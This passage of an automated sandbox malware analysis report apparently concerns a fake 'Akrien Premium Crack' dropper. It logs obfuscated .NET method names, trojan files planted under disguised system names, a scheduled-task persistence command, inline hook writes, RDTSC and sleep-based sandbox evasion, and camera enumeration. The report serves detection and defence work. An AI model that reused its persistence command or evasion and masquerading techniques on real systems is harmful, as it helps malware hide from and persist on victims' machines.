            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, Igd2vxmIHZi2nY6jRPd.csHigh entropy of concatenated method names: 'wsXCX6CPDN', 'FKnCnV7yt6', 'j5eCp74MGg', 'zMGCE2oc3o', 'x9JD8dPzgbf2X0bNjt0', 'nInhCoPXVjxnBw4hfi9', 'YJaqrXPElHcNKEtUdcM', 'u0yPpypY4NORujuCnbE', 'SH1Gpwp37eFpEnYC1E2', 'T92AAZpJDjVioYkH6lM'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, rwEgZheplS3itYinwqW.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'tlXicWugdu', 'O0Hi5JUouR', 'pG9iiECUPy', 'XiciGAEsHj', 'PJxiYnGsi1', 'Bb1iXsBHSj', 'wZemubTU7VubJag8WnQ'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, eyIXJ5diuvIdTgxq3sZ.csHigh entropy of concatenated method names: 'Ik7vFoAKrl', 'u4NvfugrNZ', 'HM1vr3Lo2N', 'lkZv1wklpb', 'beRvq2muWE', 'PnE830Ukx9FeNlO2ake', 'kjAsswUr3cuM71eK7Lr', 'N21kSZUxJjCa64sJI0U', 'kvqfMUU9QgLBno9Kmi1', 'sJJ6IFUL7e27B8bXMG5'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, NBehHxdR59aGcu7ddk7.csHigh entropy of concatenated method names: 'vA1vVcu6og', 'uapvb7WnY6', 'pK7pMEiNhGTb1iMHTDK', 'yT0ymUiq7bKvDR6LBCm', 'bGOk0HihUATtDACU1tP', 'UWI18oi24jy6nCdx9ul', 'xVI2cNiXWJGnjjsRMXf', 'N3LGejiEvauIvqx2tyN', 'ixUM0xizPcaiUMmPGWj', 'wPA94kUYBNhcoCMt37v'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, nEH65XTQxcn8ISe2sPE.csHigh entropy of concatenated method names: 'UcELb47wKH', 'MFZLsKFHnu', 'SbNLQuPuhY', 'FAOL4xeLnF', 'rigLvA5Gtu', 'pkcvc9eYntj9FJYhuwe', 'WNQgjxe3oAP8431i2Di', 'awiXGbRE6CMrlr9bXUD', 'e1JGbNRzITDaNXr88SN', 'BrpuIJeJ1RX7XElZf7R'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TpSFP7fnJV099EZ6QF.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'kap6gXdh76VZAtsb2L7', 'FcNqpld20YMeENn94dA', 'bto8tEdXOtqkqAikywt', 'xdpP8cdEHQ1BIaWuJYN', 'Pr28ssdzL3SgCfQuRIH', 'ftDAvGBYp4N4wmyRmfa'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, IMxKL9TACBKEt4IJShy.csHigh entropy of concatenated method names: 'IjPTcJ2yve', 'Q7fT5Q4yby', 'aVQTiNZKZn', 'qlngspy5aaCfIv4YFH3', 'XkaEetyaYklXI6sPyu2', 'TosoxJyKHvrd1L8L7x9', 'JoQASDyiGeB5G8S3CLV', 'IkbLE0yUasNSLechgFb', 'hVMRRDyGceNq60xuh03', 'LwyM1Py4nGYYEnABYpD'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, Qwlb79I7RZAV2xNM4K2.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GTnP25bSK1MwrxZ9hGO', 'xwnsj7b5tpd6UkP6UOb', 'l79eCMba76dMiFgq6NM', 'jl6ddjbKe1CRYJlH5ww', 'ugaqG5biKDcbsbOj38b', 'aBqoI4bUEBMXMe7qqAa'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, rXs0YCIn5MVX9jwHFAG.csHigh entropy of concatenated method names: 'QMeI83LrNM', 'xBZ4eucJ2kbK3sTJLQ1', 'w098Iscdi9GYBtFBlxy', 'gMgOd0cY8MQwSwiygq1', 'jdNmwGc3sUVxeU5yE21', 'rgYC08cBGWm5aJY24EY', 'Q8WFg1clS2yesR6bMEI', 'pfI4uQc7JBd8mKoP4CX', 'svtIK281xy', 'ooUVjocvWqlSMalpBP8'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, KM9ntwe4d0JQOH9LDfn.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DRB5vlFl7u', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TfwPTxUENEcUIJC4tM.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'LH2qy8uLC', 'kBDyGBJKmytMJLYwoYT', 'JE8KyKJiFuwP8NyAU5T', 'i5giYNJU5mO4prcpAA1', 'afucKiJGnwUZGFixkHZ', 'iKEe3YJuaTUI6rtR5b6'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, yQxUDoGjSN6MownrtR.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'zTSwDIJbU0JGcakdB0k', 'IIXdQAJyemQL03KV1la', 'cgpMZCJVbKRwWl2PNEw', 'Aoe25IJjAUyQL3Sh2kM', 'khbBS0JgtfcF5WSJdLD', 'HSEIeDJRFoWT44rF1HN'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, EJRVEyprgdxVpJXC3O.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'IC1fdwnAh', 'P7kLNlJpePgplP0tHGA', 'YIuGa0JIAQ3T5MHVNPJ', 'MZHBR1J6kBoC7EBRt1K', 'eitafUJwxDPHT5cAQWJ', 'jsBnyyJDvkyE7i31FKY'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, cupOOgmu6jCnlwctGXW.csHigh entropy of concatenated method names: '_223', 'TXxMxy6s3O3ciAtUXNR', 'qDTIiQ6PIHBA5BaiMp6', 'P5poB06pWjh5260SE8a', 'YhyvNQ6I9svyeJZ5f80', 'JWyrtd66BiLwrnKEW6n', 'zuxKEL6wt5XvJwGifSx', 'FW5OR06Di9BBjil9AR7', 'UrBNUZ68b9totyGipDg', 'S0qBYu61xjCbOoDRMVE'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, VMnMMmd6skwxkSRV6L0.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'bH1c420nxJ', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, NsqC7TmzaBcHs5P93Bq.csHigh entropy of concatenated method names: 'hVAhG4XxB9', 'GeohYYSUK5', 'C8vhXk9aAX', 'HLDuoT1tBh03PeZKdGX', 'ioY53J1TTPk6ebDvhgB', 'T3qTfw1u78OlrZaGsXy', 'cTu0dn1CZDShEZmZ5Mg', 'eBTDM81nBXW7vwicrnY', 'gxAagh1AQiGiJuFW0bx', 'uMa6e61QBOPbj82y6Kr'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, OxHtQZe0x2Kotq3yDoI.csHigh entropy of concatenated method names: 'tARYPl4Zq4', 'hbo9iInLhfmEwan3I9K', 'TxcZ7Dn45qZt8owHpbW', 'z2TdtGnkDFZemUTDLId', 'DceJh6n9twgeAurQ6ot', '_1fi', 'VeGG7XLMBV', '_676', 'IG9', 'mdP'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, A7NSCtIi9qOJ5eGf4IU.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'TWfj6HFEPV12SKcMA4O', 'fKrHupFz8AbIgIL9tL6', 'dZdWEOvYc6IJVPwqkMv', 'btRxRMv3llNDe6gKbnb', 'pxhll8vJ30F6Dp5DG3O', 'SZePEivdAP1aoiTxw48'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, wfvJRJmsvYgcdxD4n4s.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 's9n6n5DjpvcHomhhLsF', 'IcDbASDgAmCItHswTW1', 'VV817tDRYNSDD9vRFfk', 'Drcy7jDePJISl5aq6lR'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, j9T5G9TDKuGCN3ie2Mu.csHigh entropy of concatenated method names: 'ebeCcKw4RU', 'IWTg65PmDwBJJXSKSWA', 'NS23BgPOWF7G9U0DX5G', 'aHgBkFPZnrOhEQtMoEc', 'pZ7tDIPodoWkNkubUkP', 'mJGQTKPM4T2GrJhgXu4', 'hdoCJ1e9vg', 'Eo9CH3xZw0', 'vyJCVJmBAw', 'DD1CbhdKeW'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, rJnOUEIu4FQpGUR7CcZ.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'MST3wCWxtbQj0rZqOrP', 'l1Eek7WkL1wFWVDLhLg', 'x1ao1hW9Iq6wrCLPFQu', 'wksqHWWL8bEB4bQrS8o', 'fcedxuW4kNg48gjfL63', 'xKOPlXWSfmtC6w6cEmt'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, WAeOCAeZKTBo5c1jjgw.csHigh entropy of concatenated method names: 'TQ1XQlRcL2', '_1kO', '_9v4', '_294', 'ABlX4Jj3cg', 'euj', 'oJtXvKpFl4', 'uobXc6jCYq', 'o87', 'ipBX54uqmn'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, VdJwLKTVvdS3WU3eRl4.csHigh entropy of concatenated method names: 'IljL9PMxKL', 'lCBLwKEt4I', 'gKdmjwR1O4QuGx6cilL', 'x2Y7xPRHS1PPOwdvJMK', 'dwL1VIRDyo3A1TjDfDK', 'VAcrbdR8FEjqfBTVFpn', 'vcvt64Rrn4hnqoIAwb9', 'vGtyelRx4nrrjYivOXo', 'VZeuInRkfrtXVqh9RcQ', 'SbiXQpR9mpjMVO1kZU7'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, KLU84FLdtog4Jnardem.csHigh entropy of concatenated method names: 'jpPa2TNOyC', 'gqDBuVHPv3ccaxX2QBH', 'DnRQxLHp8eNkRG8GQte', 'U6BgUNH0eLnlpVJUxIv', 'RjExutHskOMKhtmcFBF', 'KolhnTmhpW', 'XkPhpwkrBC', 'J3thEqrI3r', 'V7ThUdrPC7', 'YlFhNBdWKX'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, dcdj5kTTpP3o9ZEKVF4.csHigh entropy of concatenated method names: 'hUxTKkJJWJ', 'rVYTy02ELa', 'RNYTZx3739', 'OTNT7SKTsh', 'bDPTOTdoEs', 'zV0TobcytH', 'vL3rYBVs6kNw1XJNKSk', 'aGdRuuVPIOyd89tRoRF', 's5SDW9VeyEWScdqaf7n', 'Y2LmTuV0l7B3pfYB0fb'

            Persistence and Installation Behavior

            Source: C:\Browserfont\refdhcp.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exe File created: C:\Browserfont\services.exe
            Source: C:\Users\user\Desktop\RFAwChXSve.exe File created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\ProgramData\RDMwYUvZPK.exe
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe File created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\AkrienAntiLeak\SgrmBroker.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RobloxPlayerLauncher[1].exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Recovery\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Browserfont\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Users\Public\Videos\cmd.exe
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe File created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe File created: C:\Browserfont\refdhcp.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Browserfont\Registry.exe
            Source: C:\Users\user\Desktop\RFAwChXSve.exe File created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Users\Default\Saved Games\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe File created: C:\Users\user\AppData\Local\Temp\RBX-338F2523\RobloxPlayerLauncher.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Users\user\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Windows\en-US\RuntimeBroker.exe
            Source: C:\Browserfont\refdhcp.exe File created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RDMwYUvZPK.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\version-d6abc3b106a04c5c-rbxInstallerPkgManifest[1].txt

            Boot Survival

            Source: C:\Browserfont\refdhcp.exe File created: C:\Users\user\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Memory written: PID: 7292 base: 7FFE22370008 value: E9 EB D9 E9 FF
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Memory written: PID: 7292 base: 7FFE2220D9F0 value: E9 20 26 16 00
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Memory written: PID: 7292 base: 7FFE2238000D value: E9 BB CB EB FF
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Memory written: PID: 7292 base: 7FFE2223CBC0 value: E9 5A 34 14 00
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\RFAwChXSve.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe RDTSC instruction interceptor: First address: 8537C0 second address: 85385B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe RDTSC instruction interceptor: First address: 140751F05 second address: 14079ED47 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 jmp 00007F94F0BA31CCh 0x00000008 pop ebx 0x00000009 mov al, 1Fh 0x0000000b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe RDTSC instruction interceptor: First address: 1406DCE2A second address: 1407C8C70 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 inc ecx 0x00000005 pop ebp 0x00000006 inc ecx 0x00000007 pop edi 0x00000008 adc edi, 106F2532h 0x0000000e pop edi 0x0000000f sub bp, 7BB8h 0x00000014 dec eax 0x00000015 cmp eax, 68A05505h 0x0000001b pop esi 0x0000001c pop ebp 0x0000001d dec eax 0x0000001e cwde 0x0000001f inc ecx 0x00000020 add ah, FFFFFF92h 0x00000023 inc sp 0x00000025 or ecx, ebp 0x00000027 inc ecx 0x00000028 pop esp 0x00000029 jmp 00007F94F0C3E80Ah 0x0000002e pop ecx 0x0000002f popfd 0x00000030 nop 0x00000031 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Special instruction interceptor: First address: 140FC65EC instructions rdtsc caused by: RDTSC with Trap Flag (TF)
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe Special instruction interceptor: First address: 140FC6604 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
            Source: C:\Browserfont\refdhcp.exe Memory allocated: A70000 memory reserve | memory write watch
            Source: C:\Browserfont\refdhcp.exe Memory allocated: 1A820000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Memory allocated: CB0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Memory allocated: 1A720000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Memory allocated: F40000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Memory allocated: 1ABF0000 memory reserve | memory write watch
            Source: C:\Browserfont\refdhcp.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 3600000
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599868
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599759
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599646
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599521
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599393
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599280
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599169
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 599058
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 598946
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 598834
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 598707
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 598592
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 598482
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597890
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597752
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597639
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597504
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597386
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597275
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597156
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 597053
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596926
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596799
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596687
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596577
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596466
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596354
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596242
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596130
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Thread delayed: delay time: 596003
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595344
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595207
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595094
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594983
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594871
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594755
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594632
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594452
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594315
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594203
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594091
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 593979
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 593867
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Browserfont\refdhcp.exeWindow / User API: threadDelayed 1216
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWindow / User API: threadDelayed 4614
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWindow / User API: threadDelayed 5185
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RobloxPlayerLauncher[1].exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RBX-338F2523\RobloxPlayerLauncher.exe
            Source: C:\Browserfont\refdhcp.exe TID: 7708Thread sleep count: 1216 > 30
            Source: C:\Browserfont\refdhcp.exe TID: 7684Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7856Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7768Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -39660499758475511s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -3600000s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599868s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599759s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599646s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599521s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599393s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599280s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599169s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599058s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598946s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598834s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598707s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598592s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598482s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597890s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597752s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597639s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597504s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597386s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597275s >= -30000s
